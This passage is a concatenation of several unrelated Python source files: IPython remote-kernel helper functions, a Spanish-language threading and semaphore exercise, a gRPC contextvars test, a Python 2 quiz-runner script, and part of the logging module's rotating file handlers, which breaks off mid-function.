socket = ip.display_pub.pub_socket
session = ip.display_pub.session
parent_header = ip.display_pub.parent_header
while True:
try:
msg = kc.get_iopub_msg(timeout=OUTPUT_TIMEOUT)
except queue.Empty:
raise TimeoutError("Timeout waiting for IPython output")
if msg["parent_header"].get("msg_id") != msg_id:
continue
msg_type = msg["header"]["msg_type"]
content = msg["content"]
if msg_type == "status":
if content["execution_state"] == "idle":
# idle means output is done
break
elif msg_type == "stream":
stream = getattr(sys, content["name"])
stream.write(content["text"])
elif msg_type in ("display_data", "execute_result", "error"):
if in_kernel:
session.send(socket, msg_type, content, parent=parent_header)
else:
if msg_type == "error":
print("\n".join(content["traceback"]), file=sys.stderr)
else:
sys.stdout.write(content["data"].get("text/plain", ""))
else:
pass
def register_worker_magic(connection_info, magic_name="worker"):
"""Register a %worker magic, given connection_info.
Both a line and cell magic are registered,
which run the given cell in a remote kernel.
"""
ip = get_ipython()
kc = BlockingKernelClient()
kc.load_connection_info(connection_info)
kc.start_channels()
def remote(line, cell=None):
"""Run the current cell on a remote IPython kernel"""
if cell is None:
# both line and cell magic
cell = line
run_cell_remote(ip, kc, cell)
remote.client = kc # preserve reference on kc, largely for mocking
ip.register_magic_function(remote, magic_kind="line", magic_name=magic_name)
ip.register_magic_function(remote, magic_kind="cell", magic_name=magic_name)
def remote_magic(line, cell=None):
"""A magic for running code on a specified remote worker
The connection_info dict of the worker will be looked up
as the first positional arg to the magic.
The rest of the line (or the entire cell for a %%cell magic)
will be passed to the remote kernel.
Usage:
info = e.start_ipython(worker)[worker]
%remote info print(worker.data)
"""
# get connection info from IPython's user namespace
ip = get_ipython()
split_line = line.split(None, 1)
info_name = split_line[0]
if info_name not in ip.user_ns:
raise NameError(info_name)
connection_info = dict(ip.user_ns[info_name])
if not cell: # line magic, use the rest of the line
if len(split_line) == 1:
raise ValueError("I need some code to run!")
cell = split_line[1]
# turn info dict to hashable str for use as lookup key in _clients cache
key = ",".join(map(str, sorted(connection_info.items())))
if key in remote_magic._clients:
kc = remote_magic._clients[key]
else:
kc = BlockingKernelClient()
kc.load_connection_info(connection_info)
kc.start_channels()
kc.wait_for_ready(timeout=10)
remote_magic._clients[key] = kc
# actually run the code
run_cell_remote(ip, kc, cell)
# cache clients for re-use in remote magic
remote_magic._clients = {}
def register_remote_magic(magic_name="remote"):
"""Define the parameterized %remote magic
See remote_magic above for details.
"""
ip = get_ipython()
if ip is None:
return # do nothing if IPython's not running
ip.register_magic_function(remote_magic, magic_kind="line", magic_name=magic_name)
ip.register_magic_function(remote_magic, magic_kind="cell", magic_name=magic_name)
def connect_qtconsole(connection_info, name=None, extra_args=None):
"""Open a QtConsole connected to a worker who has the given future
- identify worker with who_has
- start IPython kernel on the worker
- start qtconsole connected to the kernel
"""
runtime_dir = jupyter_runtime_dir()
if name is None:
name = uuid4().hex
path = os.path.join(runtime_dir, name + ".json")
write_connection_file(path, **connection_info)
cmd = ["jupyter", "qtconsole", "--existing", path]
if extra_args:
cmd.extend(extra_args)
Popen(cmd)
@atexit.register
def _cleanup_connection_file():
"""Cleanup our connection file when we exit."""
try:
os.remove(path)
except OSError:
pass
def start_ipython(ip=None, ns=None, log=None):
"""Start an IPython kernel in a thread
Parameters
----------
ip : str
The IP address to listen on (likely the parent object's ip).
ns : dict
Any names that should be injected into the IPython namespace.
log : logger instance
Hook up IPython's logging to an existing logger instead of the default.
"""
from IPython import get_ipython
if get_ipython() is not None:
raise RuntimeError("Cannot start IPython, it's already running.")
from ipykernel.kernelapp import IPKernelApp
# start IPython, disabling its signal handlers that won't work due to running in a thread:
app = IPKernelApp.instance(log=log)
# Don't connect to the history database
app.config.HistoryManager.hist_file = ":memory:"
# listen on all interfaces, so remote clients can connect:
if ip:
app.ip = ip
# disable some signal handling, logging
def noop():
return None
app.init_signal = noop
app.log_connection_info = noop
# start IPython in a thread
# initialization happens in the thread to avoid threading problems
# with the sqlite history
evt = Event()
def _start():
app.initialize([])
app.kernel.pre_handler_hook = noop
app.kernel.post_handler_hook = noop
app.kernel.start()
# save self in the IPython namespace as 'worker'
# inject things into the IPython namespace
if ns:
app.kernel.shell.user_ns.update(ns)
evt.set()
# start the app's IOLoop in its thread
IOLoop.current().start()
zmq_loop_thread = Thread(target=_start)
zmq_loop_thread.daemon = True
zmq_loop_thread.start()
assert evt.wait(timeout=5), "IPython didn't start in a reasonable amount of time."
return app
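# --- Usage sketch (editor's addition, not part of the original module) -------
# How the helpers above are meant to be split across processes: the worker
# starts an embedded kernel, the client (running inside IPython) attaches to
# it. Assumes IPKernelApp exposes get_connection_info(), as provided by
# jupyter_client's ConnectionFileMixin.
def _example_worker_side():  # pragma: no cover
    # Worker process: start the kernel and hand back its connection info.
    app = start_ipython(ns={"answer": 42})
    return app.get_connection_info()
def _example_client_side(connection_info):  # pragma: no cover
    # Client process (inside an IPython session): expose the remote kernel as
    # a %worker magic and optionally open a qtconsole against it.
    register_worker_magic(connection_info, magic_name="worker")
    connect_qtconsole(connection_info, name="worker-demo")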
|
solicitud.py
|
import time
import threading
import random
# Global variables
estudiantes_reunidos = 0
error = 1
visitantes_formados = []
# Semaphores used
mutex_estudiante = threading.Semaphore(1)
mutex_visitante = threading.Semaphore(1)
profesor_libre = threading.Semaphore(0)
jefe_esperando = threading.Semaphore(0)
# Professor thread definition
def Profesor():
global severidad_profesor, num_estudiantes, num_jovenes, num_visitantes
print(" El profesor se encuentra en su oficina listo para recibir visitas")
print("")
while(num_visitantes > 0):
profesor_libre.acquire()
print(" El profesor informa que la lista de visitantes formados es:", imprimeFila())
print(" El profesor está llamando al siguiente visitante")
time.sleep(random.random())
num_visitantes = num_visitantes - 1
mutex_visitante.acquire()
if(visitantes_formados.pop(0) == -1):
# For the professor to accept the request there must be a balance between both kinds of arguments, subject to how strict the professor is
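# e.g. (illustrative) with 3 young and 2 senior students the young share is
# 3*100/5 = 60%; with severidad_profesor = 40 the accepted band is [40, 60],
# so the extension would be granted.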
if(((num_jovenes*100/num_estudiantes) >= severidad_profesor) and ((num_jovenes*100/num_estudiantes) <= (100 - severidad_profesor))):
print(" El profesor ha accedido a dar más tiempo para la entrega")
else:
print(" El profesor ha determinado que la fecha de entrega no se mueve")
else:
print(" El profesor ha terminado de atender al visitante")
mutex_visitante.release()
# Group leader thread definition
def JefeGrupo(id):
print(" El jefe de grupo ha iniciado la reunión y está esperando a sus compañeros")
print("")
jefe_esperando.acquire()
print(" El jefe de grupo está ecribiendo los argumentos")
time.sleep(2)
print(" El jefe de grupo ha escrito todos los argumentos y va a ir a ver al profesor")
# Visitor critical section
mutex_visitante.acquire()
visitantes_formados.append(id)
print(" El jefe de grupo está formado para ver al profesor en la posición" )
mutex_visitante.release()
profesor_libre.release()
# Student thread definition
def Estudiante(id, tipo):
global mutex_estudiante, estudiantes_reunidos, num_estudiantes
time.sleep(random.random())
# Student critical section
mutex_estudiante.acquire()
print(13*" "+"El estudiante %s número %d ha llegado a la reunión" %(tipo, id))
estudiantes_reunidos = estudiantes_reunidos + 1
if(estudiantes_reunidos == num_estudiantes):
print(13*" "+"Los %d estudiantes están reunidos, es hora de deliberar" %(num_estudiantes))
print("")
jefe_esperando.release()
mutex_estudiante.release()
# Visitor thread definition
def Visitante(id):
global mutex_visitante, visitantes_formados, profesor_libre
time.sleep(5*random.random())
# Visitor critical section
mutex_visitante.acquire()
visitantes_formados.append(id)
print(13*" "+"El visitante %d está formado para ver al profesor" %id)
mutex_visitante.release()
profesor_libre.release()
# Helper that prints the queue of visitors currently in line
def imprimeFila():
fila = ""
for i in visitantes_formados:
if(i==-1):
fila += " jefe de grupo,"
else:
fila += " visitante " + str(i) + ","
return fila[0:-1]
# Program start
print("")
print("")
print(" BIENVENIDO")
print("")
while(error == 1):
# Collect input data from the user
try:
num_jovenes = int(input(" Ingrese el número de estudiantes jóvenes en el grupo: "))
num_mayores = int(input(" Ingrese el número de estudiantes mayores en el grupo: "))
num_visitantes = int(input(" Ingrese el número de visitantes extra para el profesor: ")) + 1
severidad_profesor = int(input(" Ingrese que tan estricto es el profesor (0-50): "))
print("")
print("")
num_estudiantes = num_jovenes + num_mayores
error = 0
except ValueError as e1:
print(" Tipo de dato equivocado, ingrese los valores de nuevo, por favor")
print("")
# Thread initialization
# Group leader thread
threading.Thread(target=JefeGrupo,args=[-1]).start()
# Professor thread
threading.Thread(target=Profesor, args=[]).start()
print("")
# Young student threads
for k in range(num_jovenes):
threading.Thread(target=Estudiante,args=[k, "joven"]).start()
# Senior student threads
for i in range (num_mayores):
threading.Thread(target=Estudiante,args=[num_jovenes + i, "mayor"]).start()
# Visitor threads
for j in range (num_visitantes - 1):
threading.Thread(target=Visitante,args=[j]).start()
|
_contextvars_propagation_test.py
|
# Copyright 2020 The gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test of propagation of contextvars to AuthMetadataPlugin threads.."""
import contextlib
import logging
import os
import sys
import threading
import unittest
import grpc
from six.moves import queue
from tests.unit import test_common
_UNARY_UNARY = "/test/UnaryUnary"
_REQUEST = b"0000"
def _unary_unary_handler(request, context):
return request
def contextvars_supported():
try:
import contextvars
return True
except ImportError:
return False
class _GenericHandler(grpc.GenericRpcHandler):
def service(self, handler_call_details):
if handler_call_details.method == _UNARY_UNARY:
return grpc.unary_unary_rpc_method_handler(_unary_unary_handler)
else:
raise NotImplementedError()
@contextlib.contextmanager
def _server():
try:
server = test_common.test_server()
target = 'localhost:0'
port = server.add_insecure_port(target)
server.add_generic_rpc_handlers((_GenericHandler(),))
server.start()
yield port
finally:
server.stop(None)
if contextvars_supported():
import contextvars
_EXPECTED_VALUE = 24601
test_var = contextvars.ContextVar("test_var", default=None)
def set_up_expected_context():
test_var.set(_EXPECTED_VALUE)
class TestCallCredentials(grpc.AuthMetadataPlugin):
def __call__(self, context, callback):
if test_var.get(
) != _EXPECTED_VALUE and not test_common.running_under_gevent():
# contextvars do not work under gevent, but the rest of this
# test is still valuable as a test of concurrent runs of the
# metadata credentials code path.
raise AssertionError("{} != {}".format(test_var.get(),
_EXPECTED_VALUE))
callback((), None)
def assert_called(self, test):
test.assertTrue(self._invoked)
test.assertEqual(_EXPECTED_VALUE, self._recorded_value)
else:
def set_up_expected_context():
pass
class TestCallCredentials(grpc.AuthMetadataPlugin):
def __call__(self, context, callback):
callback((), None)
# TODO(https://github.com/grpc/grpc/issues/22257)
@unittest.skipIf(os.name == "nt", "LocalCredentials not supported on Windows.")
class ContextVarsPropagationTest(unittest.TestCase):
def test_propagation_to_auth_plugin(self):
set_up_expected_context()
with _server() as port:
target = "localhost:{}".format(port)
local_credentials = grpc.local_channel_credentials()
test_call_credentials = TestCallCredentials()
call_credentials = grpc.metadata_call_credentials(
test_call_credentials, "test call credentials")
composite_credentials = grpc.composite_channel_credentials(
local_credentials, call_credentials)
with grpc.secure_channel(target, composite_credentials) as channel:
stub = channel.unary_unary(_UNARY_UNARY)
response = stub(_REQUEST, wait_for_ready=True)
self.assertEqual(_REQUEST, response)
def test_concurrent_propagation(self):
_THREAD_COUNT = 32
_RPC_COUNT = 32
set_up_expected_context()
with _server() as port:
target = "localhost:{}".format(port)
local_credentials = grpc.local_channel_credentials()
test_call_credentials = TestCallCredentials()
call_credentials = grpc.metadata_call_credentials(
test_call_credentials, "test call credentials")
composite_credentials = grpc.composite_channel_credentials(
local_credentials, call_credentials)
wait_group = test_common.WaitGroup(_THREAD_COUNT)
def _run_on_thread(exception_queue):
try:
with grpc.secure_channel(target,
composite_credentials) as channel:
stub = channel.unary_unary(_UNARY_UNARY)
wait_group.done()
wait_group.wait()
for i in range(_RPC_COUNT):
response = stub(_REQUEST, wait_for_ready=True)
self.assertEqual(_REQUEST, response)
except Exception as e: # pylint: disable=broad-except
exception_queue.put(e)
threads = []
for _ in range(_THREAD_COUNT):
q = queue.Queue()
thread = threading.Thread(target=_run_on_thread, args=(q,))
thread.setDaemon(True)
thread.start()
threads.append((thread, q))
for thread, q in threads:
thread.join()
if not q.empty():
raise q.get()
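# Illustrative sketch (not part of the gRPC test suite): the behaviour verified
# above is that a value set via contextvars in the calling thread is visible
# inside the AuthMetadataPlugin, which gRPC may invoke on another thread. The
# plain-threading equivalent carries a context snapshot onto the worker thread
# with contextvars.copy_context(); the names below are hypothetical.
def _copy_context_sketch():
    import contextvars
    import threading as _threading

    var = contextvars.ContextVar("sketch_var", default=None)
    var.set(24601)
    snapshot = contextvars.copy_context()

    results = []
    # Run var.get inside the snapshot so the worker observes the value that was
    # current when the snapshot was taken, not the worker's own empty context.
    worker = _threading.Thread(target=lambda: results.append(snapshot.run(var.get)))
    worker.start()
    worker.join()
    assert results == [24601]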
if __name__ == '__main__':
logging.basicConfig()
unittest.main(verbosity=2)
|
main.py
|
import json, argparse, sys, random, os, re
from threading import Thread
from time import sleep
from collections import Iterator
# See example.json for example
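# The expected shape of that file, inferred from the fields this script reads
# (question, answer_bank, answers, explanation, and the optional chapter and
# category keys); the concrete values below are illustrative only:
#
#   {
#     "questions": [
#       {
#         "question": "Which layer of the OSI model handles routing?",
#         "answer_bank": {"A": "Transport", "B": "Network", "C": "Session"},
#         "answers": ["B"],
#         "explanation": "Routing is a layer-3 (network layer) function.",
#         "chapter": "1",
#         "category": "networking"
#       }
#     ]
#   }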
class Exam(Iterator):
def __init__(self, file_name= None, shuffle=False, shuffle_answers=False, limit=-1, test_mode=False, **kwargs):
self.count_questions = None
if kwargs:
self.count_questions = kwargs['count_questions']
self.file_name = file_name
self.exam = self.load_test()
self.questions = [x for x in self.exam['questions'] if (not kwargs['chapter'] or x.get('chapter', None)==kwargs['chapter']) and (not kwargs['category'] or x.get('category', None)==kwargs['category'])]
if shuffle: random.shuffle(self.questions)
self.shuffle_answers = shuffle_answers
self.limit = limit
if self.limit == -1: self.limit = len(self.questions)
self.test_mode = test_mode
self.correct = 0
self.i = -1
def load_test(self):
# Read and parse the exam definition straight from the JSON file.
with open(self.file_name) as f:
return json.load(f)
def __iter__(self):
return self
def next(self):
if self.i < len(self.questions) - 1 and (self.limit <= 0 or self.i < self.limit - 1):
self.i += 1
return self.questions[self.i]
else:
raise StopIteration
def countdown():
for i in range(60):
sys.stdout.write("Timer: %d\r" % (i))
sys.stdout.flush()
sleep(1)
def main(exam):
input = None
current_question=0
incorrect_questions=[]
question_count=min(len(exam.questions), exam.limit)
if not exam.count_questions:
for i, question in enumerate(exam):
current_question+=1
print "Question(%s of %s): %s" % (current_question, question_count, question['question'])
answer_keys = question['answer_bank'].keys()
answers = map(str, question['answers'])
required_correct_answers = len(answers)
correct_answers = 0
#print required_correct_answers
# Shuffle if enabled, else sort by key
if exam.shuffle_answers: random.shuffle(answer_keys)
else: answer_keys = sorted(answer_keys)
print ""
for k in answer_keys:
print k + ': ' + question['answer_bank'][k]
while True:
did_not_know_answer = False
print ""
input = raw_input("Your answer [" + str(required_correct_answers) + "]: ").strip().upper()
if len(input):
if "P" in input:
print "Passed."
break
if "X" in input and not exam.test_mode:
print answers
print ""
print "Explanation: %s" % question['explanation']
break
# Sort and de-duplicate the input before comparing against the answer set
if sorted(set(input)) == sorted(answers):
if exam.test_mode:
exam.correct += 1
else:
print "Correct!"
if len(question['explanation']):
print "Explanation: %s" % question['explanation']
break
else:
if not exam.test_mode:
print "Try again!"
else:
incorrect_questions.append(question)
break
else:
print "An answer must be provided."
continue
print ""
raw_input("Next?")
os.system('clear')
if exam.test_mode:
print "Test score: %s / %s" % (exam.correct, exam.limit)
while True:
show_incorrect = raw_input("Do you wish to view the questions that were answered incorrectly (y/n)? ").lower()
if show_incorrect == "n": break
elif show_incorrect == "y":
for j, inc_question in enumerate(incorrect_questions):
print "Question %s: %s" % (j, inc_question['question'])
print ""
answer_keys = inc_question['answer_bank'].keys()
for k in sorted(answer_keys):
print k + ': ' + inc_question['answer_bank'][k]
print ""
print "Answer(s): %s" % (map(str,inc_question['answers']))
print ""
print "Explanation: %s" % inc_question['explanation']
raw_input("Next?")
os.system('clear')
break
else:
os.system('clear')
print "Total questions in exam: %s" % len(exam.questions)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--file', default=None)
parser.add_argument('-c', '--chapter', default=None)
parser.add_argument('-g', '--category', default=None)
parser.add_argument('-r', '--random_questions', default=False, action='store_true')
parser.add_argument('-s', '--shuffle_answers', default=False, action='store_true')
parser.add_argument('-t', '--test_mode', default=False, action='store_true')
parser.add_argument('-l', '--question_limit', type=int, default=-1)
parser.add_argument('--count_questions', default=False, action='store_true')
pargs = parser.parse_args()
if pargs.file:
os.system('clear')
# Temp is going to change; chapter may be substituted with category
temp={'chapter':pargs.chapter, 'category': pargs.category}
exam=Exam(file_name=pargs.file, shuffle=pargs.random_questions, shuffle_answers=pargs.shuffle_answers, limit=pargs.question_limit, test_mode=pargs.test_mode, count_questions=pargs.count_questions, **temp)
#t1=Thread(target=countdown)
t2=Thread(target=main, args=(exam,))
#t1.start()
t2.start()
else:
print "Exam file name must be provided."
sys.exit(1)
|
handlers.py
|
# Copyright 2001-2016 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python.
Copyright (C) 2001-2016 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import logging, socket, os, pickle, struct, time, re
from stat import ST_DEV, ST_INO, ST_MTIME
import queue
import threading
import copy
#
# Some constants...
#
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60 # number of seconds in a day
class BaseRotatingHandler(logging.FileHandler):
"""
Base class for handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
or TimedRotatingFileHandler.
"""
def __init__(self, filename, mode, encoding=None, delay=False):
"""
Use the specified filename for streamed logging
"""
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.mode = mode
self.encoding = encoding
self.namer = None
self.rotator = None
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering for rollover as described
in doRollover().
"""
try:
if self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
except Exception:
self.handleError(record)
def rotation_filename(self, default_name):
"""
Modify the filename of a log file when rotating.
This is provided so that a custom filename can be provided.
The default implementation calls the 'namer' attribute of the
handler, if it's callable, passing the default name to
it. If the attribute isn't callable (the default is None), the name
is returned unchanged.
:param default_name: The default name for the log file.
"""
if not callable(self.namer):
result = default_name
else:
result = self.namer(default_name)
return result
def rotate(self, source, dest):
"""
When rotating, rotate the current log.
The default implementation calls the 'rotator' attribute of the
handler, if it's callable, passing the source and dest arguments to
it. If the attribute isn't callable (the default is None), the source
is simply renamed to the destination.
:param source: The source filename. This is normally the base
filename, e.g. 'test.log'
:param dest: The destination filename. This is normally
what the source is rotated to, e.g. 'test.log.1'.
"""
if not callable(self.rotator):
# Issue 18940: A file may not have been created if delay is True.
if os.path.exists(source):
os.rename(source, dest)
else:
self.rotator(source, dest)
class RotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a set of files, which switches from one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0, encoding=None, delay=False):
"""
Open the specified file and use it as the stream for logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes and backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file is nearly maxBytes in
length. If backupCount is >= 1, the system will successively create
new files with the same pathname as the base file, but with extensions
".1", ".2" etc. appended to it. For example, with a backupCount of 5
and a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to is always "app.log" - when it gets filled up, it is closed
and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes is zero, rollover never occurs.
"""
# If rotation/rollover is wanted, it doesn't make sense to use another
# mode. If for example 'w' were specified, then if there were multiple
# runs of the calling application, the logs from previous runs would be
# lost if the 'w' is respected, because the log file would be truncated
# on each run.
if maxBytes > 0:
mode = 'a'
BaseRotatingHandler.__init__(self, filename, mode, encoding, delay)
self.maxBytes = maxBytes
self.backupCount = backupCount
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = self.rotation_filename("%s.%d" % (self.baseFilename, i))
dfn = self.rotation_filename("%s.%d" % (self.baseFilename,
i + 1))
if os.path.exists(sfn):
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.rotation_filename(self.baseFilename + ".1")
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if not self.delay:
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine if rollover should occur.
Basically, see if the supplied record would cause the file to exceed
the size limit we have.
"""
if self.stream is None: # delay was set...
self.stream = self._open()
if self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
return 1
return 0
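# Usage sketch (illustrative, not part of this module's API surface): cap the
# log at roughly one megabyte and keep three rotated backups, so at most
# app.log, app.log.1, app.log.2 and app.log.3 exist at any time.
def _rotating_file_handler_example():
    logger = logging.getLogger("rotating-example")  # hypothetical logger name
    handler = RotatingFileHandler("app.log", maxBytes=1_000_000, backupCount=3)
    handler.setFormatter(logging.Formatter("%(asctime)s %(levelname)s %(message)s"))
    logger.addHandler(handler)
    logger.warning("this record goes to app.log and rolls over near 1 MB")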
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the log file at certain timed
intervals.
If backupCount is > 0, when rollover is done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0, encoding=None, delay=False, utc=False, atTime=None):
BaseRotatingHandler.__init__(self, filename, 'a', encoding, delay)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
self.atTime = atTime
# Calculate the real rollover interval, which is just the number of
# seconds between rollovers. Also set the filename suffix used when
# a rollover occurs. Current 'when' events supported:
# S - Seconds
# M - Minutes
# H - Hours
# D - Days
# midnight - roll over at midnight
# W{0-6} - roll over on a certain day; 0 - Monday
#
# Case of the 'when' specifier is not important; lower or upper case
# will work.
if self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}(\.\w+)?$"
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
if len(self.when) != 2:
raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError("Invalid day specified for weekly rollover: %s" % self.when)
self.dayOfWeek = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
else:
raise ValueError("Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval # multiply by units requested
# The following line added because the filename passed in could be a
# path object (see Issue #27493), but self.baseFilename will be a string
filename = self.baseFilename
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
# If we are rolling over at midnight or weekly, then the interval is already known.
# What we need to figure out is WHEN the next interval is. In other words,
# if you are rolling over at midnight, then your base interval is 1 day,
# but you want to start that one day clock at midnight, not now. So, we
# have to fudge the rolloverAt value in order to trigger the first rollover
# at the right time. After that, the regular interval will take care of
# the rest. Note that this code doesn't care about leap seconds. :)
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
# This could be done with less code, but I wanted it to be clear
if self.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
currentDay = t[6]
# r is the number of seconds left between now and the next rotation
if self.atTime is None:
rotate_ts = _MIDNIGHT
else:
rotate_ts = ((self.atTime.hour * 60 + self.atTime.minute)*60 +
self.atTime.second)
r = rotate_ts - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
if r < 0:
# Rotate time is before the current time (for example when
# self.rotateAt is 13:45 and it now 14:15), rotation is
# tomorrow.
r += _MIDNIGHT
currentDay = (currentDay + 1) % 7
result = currentTime + r
# If we are rolling over on a certain day, add in the number of days until
# the next rollover, but offset by 1 since we just calculated the time
# until the next day starts. There are three cases:
# Case 1) The day to rollover is today; in this case, do nothing
# Case 2) The day to rollover is further in the interval (i.e., today is
# day 2 (Wednesday) and rollover is on day 6 (Sunday). Days to
# next rollover is simply 6 - 2 - 1, or 3.
# Case 3) The day to rollover is behind us in the interval (i.e., today
# is day 5 (Saturday) and rollover is on day 3 (Thursday).
# Days to rollover is 6 - 5 + 3, or 4. In this case, it's the
# number of days left in the current week (1) plus the number
# of days in the next week until the rollover day (3).
# The calculations described in 2) and 3) above need to have a day added.
# This is because the above time calculation takes us to midnight on this
# day, i.e. the start of the next day.
if self.when.startswith('W'):
day = currentDay # 0 is Monday
if day != self.dayOfWeek:
if day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
else:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + (daysToWait * (60 * 60 * 24))
if not self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
result = newRolloverAt
return result
def shouldRollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
t = int(time.time())
if t >= self.rolloverAt:
return 1
return 0
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
prefix = baseName + "."
plen = len(prefix)
for fileName in fileNames:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirName, fileName))
if len(result) < self.backupCount:
result = []
else:
result.sort()
result = result[:len(result) - self.backupCount]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the filename
when the rollover happens. However, you want the file to be named for the
start of the interval, not the current time. If there is a backup count,
then we have to get a list of matching filenames, sort them and remove
the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
# get the time that this sequence started at and make it a TimeTuple
currentTime = int(time.time())
dstNow = time.localtime(currentTime)[-1]
t = self.rolloverAt - self.interval
if self.utc:
timeTuple = time.gmtime(t)
else:
timeTuple = time.localtime(t)
dstThen = timeTuple[-1]
if dstNow != dstThen:
if dstNow:
addend = 3600
else:
addend = -3600
timeTuple = time.localtime(t + addend)
dfn = self.rotation_filename(self.baseFilename + "." +
time.strftime(self.suffix, timeTuple))
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if self.backupCount > 0:
for s in self.getFilesToDelete():
os.remove(s)
if not self.delay:
self.stream = self._open()
newRolloverAt = self.computeRollover(currentTime)
while newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
#If DST changes and midnight or weekly rollover, adjust for this.
if (self.when == 'MIDNIGHT' or self.when.startswith('W')) and not self.utc:
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
